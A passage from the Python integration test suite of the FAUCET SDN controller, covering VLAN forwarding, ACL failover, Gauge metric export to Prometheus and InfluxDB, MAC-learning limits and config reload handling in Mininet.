second_host_ip = ipaddress.ip_address(second_host.IP())
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
self.flap_all_switch_ports()
class FaucetUntaggedTcpIPv6IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
for _ in range(3):
self.ping_all_when_learned()
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.one_ipv6_ping(first_host, second_host_ip.ip))
self.flap_all_switch_ports()
class FaucetSanityTest(FaucetUntaggedTest):
"""Sanity test - make sure test environment is correct before running all tess."""
def test_scapy_fuzz(self):
# Scapy 2.4.5 has issues with 'fuzz' generation
# so black-list that version with a test
exception = False
try:
scapy.all.send(scapy.all.fuzz(scapy.all.Ether())) # pylint: disable=no-member
except Exception as e: # pylint: disable=broad-except
error('%s:' % self._test_name(), e)
exception = True
self.assertFalse(exception, 'Scapy threw an exception in send(fuzz())')
def test_ryu_config(self):
varstr = ', '.join(self.scrape_prometheus(var='ryu_config'))
self.assertTrue('echo_request_interval"} 10.0' in varstr)
self.assertTrue('maximum_unreplied_echo_requests"} 5.0' in varstr)
def verify_dp_port_healthy(self, dp_port, retries=5, min_mbps=MIN_MBPS):
for _ in range(retries):
port_desc = self.get_port_desc_from_dpid(self.dpid, dp_port)
port_name = port_desc['name']
port_state = port_desc['state']
port_config = port_desc['config']
port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
error('DP %u is %s, at %u mbps\n' % (dp_port, port_name, port_speed_mbps))
if port_speed_mbps < min_mbps:
error('port speed %u below minimum %u mbps\n' % (
port_speed_mbps, min_mbps))
elif port_config != 0:
error('port config %u must be 0 (all clear)' % port_config)
elif port_state not in (0, 4):
error('state %u must be 0 (all flags clear or live)\n' % (
port_state))
else:
return
time.sleep(1)
self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))
def test_portmap(self):
prom_desc = self.scrape_prometheus(var='of_dp_desc_stats')
self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
error('DP: %s\n' % prom_desc[0])
error('port_map: %s\n' % self.port_map)
for i, host in enumerate(self.hosts_name_ordered(), start=1):
in_port = 'port_%u' % i
dp_port = self.port_map[in_port]
if dp_port in self.switch_map:
error('verifying cabling for %s: host %s -> dp %u\n' % (
in_port, self.switch_map[dp_port], dp_port))
else:
error('verifying host %s -> dp %s\n' % (
in_port, dp_port))
self.verify_dp_port_healthy(dp_port)
self.require_host_learned(host, in_port=dp_port)
learned = self.prom_macs_learned()
self.assertEqual(
len(self.hosts_name_ordered()), len(learned),
msg='test requires exactly %u hosts learned (got %s)' % (
len(self.hosts_name_ordered()), learned))
def test_listening(self):
msg_template = (
'Processes listening on test, or all interfaces may interfere with tests. '
'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
controller = self._get_controller()
ss_out = controller.cmd('ss -lnep').splitlines()
listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
listening_all = [line for line in ss_out if listening_all_re.match(line)]
for test_intf in list(self.switch_map.values()):
int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
listening_int = [line for line in ss_out if int_re.match(line)]
self.assertFalse(
len(listening_int),
msg=(msg_template % '\n'.join(listening_int)))
if listening_all:
print('Warning: %s' % (msg_template % '\n'.join(listening_all)))
def test_silence(self):
# Make all test hosts silent and ensure we hear no other packets.
for host in self.hosts_name_ordered():
self.host_drop_all_ips(host)
host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
for host in self.hosts_name_ordered():
tcpdump_filter = ''
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
self.tcpdump_rx_packets(tcpdump_txt, 0)
self.assertTrue(
self.tcpdump_rx_packets(tcpdump_txt, 0),
msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
"""Testing Gauge Prometheus"""
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def _start_gauge_check(self):
if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
return 'gauge not listening on prometheus port'
return None
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertIsNotNone(self.scrape_prometheus_var(
'faucet_pbr_version', any_labels=True, controller=self.gauge_controller.name, retries=3))
conf = self._get_faucet_conf()
cookie = conf['dps'][self.DP_NAME]['cookie']
if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
self.fail(msg='Gauge Prometheus port counters not increasing')
for _ in range(self.DB_TIMEOUT * 3):
updated_counters = True
for host in self.hosts_name_ordered():
host_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'cookie': cookie,
'eth_dst': host.MAC(),
'inst_count': str(1),
'table_id': str(self._ETH_DST_TABLE),
'vlan': str(100),
'vlan_vid': str(4196)
}
packet_count = self.scrape_prometheus_var(
'flow_packet_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
byte_count = self.scrape_prometheus_var(
'flow_byte_count_eth_dst', labels=host_labels, controller=self.gauge_controller.name)
if packet_count is None or packet_count == 0:
updated_counters = False
if byte_count is None or byte_count == 0:
updated_counters = False
if updated_counters:
return
time.sleep(1)
self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
"""Basic untagged VLAN test with Influx."""
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {'gauge_influx_port': None}
influx_log = None
server_thread = None
server = None
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 2
db: 'influx'
port_state:
dps: ['%s']
type: 'port_state'
interval: 2
db: 'influx'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 2
db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def setup_influx(self):
self.influx_log = os.path.join(self.tmpdir, 'influx.log')
if self.server:
self.server.influx_log = self.influx_log
self.server.timeout = self.DB_TIMEOUT
def setUp(self):
self.handler = InfluxPostHandler
super().setUp()
self.setup_influx()
def tearDown(self, ignore_oferrors=False):
if self.server:
self.server.shutdown()
self.server.socket.close()
super().tearDown(ignore_oferrors=ignore_oferrors)
def _wait_error_shipping(self, timeout=None):
if timeout is None:
timeout = self.DB_TIMEOUT * 3 * 2
self.wait_until_matching_lines_from_gauge_log_files(
r'.+error shipping.+', timeout=timeout)
def _verify_influx_log(self, retries=3):
self.assertTrue(os.path.exists(self.influx_log))
expected_vars = {
'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
'port_state_reason', 'packets_in', 'packets_out'}
observed_vars = set()
for _ in range(retries):
with open(self.influx_log) as influx_log:
influx_log_lines = influx_log.readlines()
for point_line in influx_log_lines:
point_fields = point_line.strip().split()
self.assertEqual(3, len(point_fields), msg=point_fields)
ts_name, value_field, _ = point_fields
value = float(value_field.split('=')[1])
ts_name_fields = ts_name.split(',')
self.assertGreater(len(ts_name_fields), 1)
observed_vars.add(ts_name_fields[0])
label_values = {}
for label_value in ts_name_fields[1:]:
label, value = label_value.split('=')
label_values[label] = value
if ts_name.startswith('flow'):
self.assertTrue('inst_count' in label_values, msg=point_line)
if 'vlan_vid' in label_values:
self.assertEqual(
int(label_values['vlan']), int(value) ^ 0x1000)
if expected_vars == observed_vars:
break
time.sleep(1)
self.assertEqual(expected_vars, observed_vars)
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
def _wait_influx_log(self):
for _ in range(self.DB_TIMEOUT * 3):
if os.path.exists(self.influx_log):
return
time.sleep(1)
def _start_gauge_check(self):
if self.server_thread:
return None
influx_port = self.config_ports['gauge_influx_port']
try:
self.server = QuietHTTPServer(
(mininet_test_util.LOCALHOST, influx_port),
self.handler) # pytype: disable=attribute-error
self.server.timeout = self.DB_TIMEOUT
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
return None
except socket.error as err:
return 'cannot start Influx test server: %s' % err
def test_untagged(self):
self.ping_all_when_learned()
self.hup_controller(self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {
'gauge_prom_port': None,
'gauge_influx_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
dbs: ['prometheus', 'influx']
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
dbs: ['prometheus', 'influx']
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
@staticmethod
def test_tagged():
return
def test_untagged(self):
self.wait_dp_status(1, controller=self.gauge_controller.name)
self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
self.ping_all_when_learned()
self.hup_controller(controller=self.gauge_controller.name)
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
def _start_gauge_check(self):
return None
def test_untagged(self):
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.2'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_timeout: 2
"""
def _start_gauge_check(self):
return None
def test_untagged(self):
self.gauge_controller.cmd(
'route add 127.0.0.2 gw 127.0.0.1 lo')
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
def setUp(self):
self.handler = SlowInfluxPostHandler
super().setUp()
self.setup_influx()
def test_untagged(self):
self.ping_all_when_learned()
self._wait_influx_log()
self.assertTrue(os.path.exists(self.influx_log))
self._wait_error_shipping()
self.verify_no_exception(self.env[self.gauge_controller.name]['GAUGE_EXCEPTION_LOG'])
class FaucetNailedForwardingTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_lldp_blocked()
# Verify 802.1x flood block triggered.
self.wait_nonzero_packet_count_flow(
{'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'},
table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
"""Test mixture of tagged and untagged hosts on the same VLAN."""
N_TAGGED = 1
N_UNTAGGED = 3
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "mixed"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=1, n_untagged=3, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
"""Test connectivity including after port flapping."""
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.ping_all_when_learned()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
REQUIRES_METADATA = True
CONFIG = """
egress_pipeline: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: 2
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all()
learned_hosts = [
host for host in self.hosts_name_ordered() if self.host_learned(host)]
self.assertEqual(2, len(learned_hosts))
self.assertEqual(2, self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
self.assertGreater(
self.scrape_prometheus_var(
'vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
MAX_HOSTS = 3
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
max_hosts: 3
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.ping_all_when_learned()
for i in range(10, 10 + (self.MAX_HOSTS * 2)):
mac_intf = 'mac%u' % i
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
ping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, mac_intf, first_host.IP()),
2)
second_host.cmd(ping_cmd)
flows = self.get_matching_flows_on_dpid(
self.dpid,
{'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
table_id=self._ETH_SRC_TABLE)
self.assertEqual(self.MAX_HOSTS, len(flows))
port_labels = self.port_labels(self.port_map['port_2'])
self.assertGreater(
self.scrape_prometheus_var(
'port_learn_bans', port_labels), 0)
learned_macs = [
mac for _, mac in self.scrape_prometheus_var(
'learned_macs', dict(port_labels, vlan=100),
multiple=True) if mac]
self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
"""Test that hosts learned and reported in Prometheus, time out."""
TIMEOUT = 15
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 25
arp_neighbor_timeout: 12
nd_neighbor_timeout: 12
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
def hosts_learned(self, hosts):
"""Check that hosts are learned by FAUCET on the expected ports."""
macs_learned = []
for mac, port in hosts.items():
if self.prom_mac_learned(mac, port=port):
self.mac_learned(mac, in_port=port)
macs_learned.append(mac)
return macs_learned
def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
fping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c%u %s' % (
self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
self.TIMEOUT / 2)
for _ in range(3):
fping_out = first_host.cmd(fping_cmd)
self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
macs_learned = self.hosts_learned(hosts)
if len(macs_learned) == len(hosts):
return
time.sleep(1)
first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
all_learned_mac_ports = {}
# learn batches of hosts, then down them
for base in (10, 20, 30):
def add_macvlans(base, count):
mac_intfs = []
mac_ips = []
learned_mac_ports = {}
for i in range(base, base + count):
mac_intf = 'mac%u' % i
mac_intfs.append(mac_intf)
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
learned_mac_ports[macvlan_mac] = self.port_map['port_2']
mac_ips.append((mac_ipv4, macvlan_mac))
return (mac_intfs, mac_ips, learned_mac_ports)
def down_macvlans(macvlans):
for macvlan in macvlans:
second_host.cmd('ip link set dev %s down' % macvlan)
def learn_then_down_hosts(base, count):
mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
down_macvlans(mac_intfs)
return learned_mac_ports
learned_mac_ports = learn_then_down_hosts(base, 5)
all_learned_mac_ports.update(learned_mac_ports)
# make sure at least one host still learned
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.assertTrue(learned_macs)
before_expiry_learned_macs = learned_macs
# make sure they all eventually expire
for _ in range(self.TIMEOUT * 3):
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.verify_learn_counters(
100, list(range(1, len(self.hosts_name_ordered()) + 1)))
if not learned_macs:
break
time.sleep(1)
self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
self.assertTrue(before_expiry_learned_macs)
for mac in before_expiry_learned_macs:
self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
"""Test broken reset idle timer on flow refresh workaround."""
CONFIG = """
timeout: 15
arp_neighbor_timeout: 4
nd_neighbor_timeout: 4
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 512
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.254.254'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 1024
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.0.1'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) + """
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
"""Test handling HUP signal without config change."""
def _configure_count_with_retry(self, expected_count):
expected = [expected_count for _ in range(self.NUM_FAUCET_CONTROLLERS)]
counts = []
for _ in range(3):
counts = []
for controller in self.faucet_controllers:
count = self.get_configure_count(controller=controller.name)
counts.append(count)
if counts == expected:
break
time.sleep(1)
self.assertEqual(
counts, expected,
'Controller configure counts %s != expected counts %s' % (counts, expected))
def test_untagged(self):
"""Test that FAUCET receives HUP signal and keeps switching."""
init_config_count = self.get_configure_count()
reload_type_vars = (
'faucet_config_reload_cold',
'faucet_config_reload_warm')
reload_vals = {}
for var in reload_type_vars:
reload_vals[var] = self.scrape_prometheus_var(
var, dpid=True, default=None)
for i in range(init_config_count, init_config_count + 3):
self._configure_count_with_retry(i)
with open(self.faucet_config_path, 'a') as config_file:
config_file.write('\n')
self.verify_faucet_reconf(change_expected=False)
self._configure_count_with_retry(i + 1)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_disconnections_total', dpid=True, default=None),
0)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_connections_total', dpid=True, default=None),
1)
self.wait_until_controller_flow()
self.ping_all_when_learned()
for var in reload_type_vars:
self.assertEqual(
reload_vals[var],
self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetIPv4TupleTest(FaucetTest):
MAX_RULES = 1024
ETH_TYPE = IPV4_ETH
NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
table_sizes:
port_acl: 1100
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
"""
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 2048
